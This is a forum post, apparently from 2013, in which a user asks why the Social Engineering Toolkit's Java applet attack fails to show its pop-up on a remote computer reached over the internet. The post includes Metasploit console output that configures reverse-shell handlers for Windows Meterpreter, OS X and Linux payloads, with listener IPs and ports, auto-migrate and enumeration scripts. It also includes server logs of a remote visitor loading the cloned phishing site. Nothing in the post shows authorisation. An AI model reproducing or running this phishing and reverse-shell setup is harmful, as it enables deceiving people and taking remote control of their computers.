Hi

Ive been using SET now for a few weeks, Got most of the methods to work but i am unable to get the java applet attack to work correctly. Ive Port forwederd my bt home hub router on 433, 8080, 80, 8081 and still im unable to get the java pop up at the other computer which im doing over the internet. Ive been trying it with my internal ip and my global justto see it would make any difference. The site i choose to clone comes up on the other computer everytime but just cant seem to get the java warning box to pop up.

Im running SET from bt5 r3 install to my HDD to a vista running machine, This is some of the text from the program im running,,, seems to be some kind of error at the end but not sure what it means.

*] Processing /pentest/exploits/set/src/program_junk/meta_config for ERB directives.
resource (/pentest/exploits/set/src/program_junk/meta_config)> use exploit/multi/handler
resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (/pentest/exploits/set/src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/pentest/exploits/set/src/program_junk/meta_config)> set AutoRunScript migrate -f
AutoRunScript => migrate -f
resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.
resource (/pentest/exploits/set/src/program_junk/meta_config)> use exploit/multi/handler
resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD osx/x86/shell_reverse_tcp
PAYLOAD => osx/x86/shell_reverse_tcp
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 192.168.1.65[*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler...
LHOST => 192.168.1.65
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 8080
LPORT => 8080
resource (/pentest/exploits/set/src/program_junk/meta_config)> set InitialAutoRunScript post/osx/gather/enum_osx
InitialAutoRunScript => post/osx/gather/enum_osx
resource (/pentest/exploits/set/src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.
resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 192.168.1.65[*] Started reverse handler on 192.168.1.65:8080
LHOST => 192.168.1.65[*] Starting the payload handler...
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 8081
LPORT => 8081
ExitOnSession => false
msf exploit(handler) > [*] Started reverse handler on 192.168.1.65:8081 [*] Starting the payload handler...
109.144.207.254 - - [04/Feb/2013 17:30:12] "GET / HTTP/1.1" 200 -
109.144.207.254 - - [04/Feb/2013 17:30:14] code 404, message File not found
109.144.207.254 - - [04/Feb/2013 17:30:14] "GET /common/gzip_detect.php/gzip.html HTTP/1.1" 404 -

Tried to google this but found nothing that could help me out#

Regards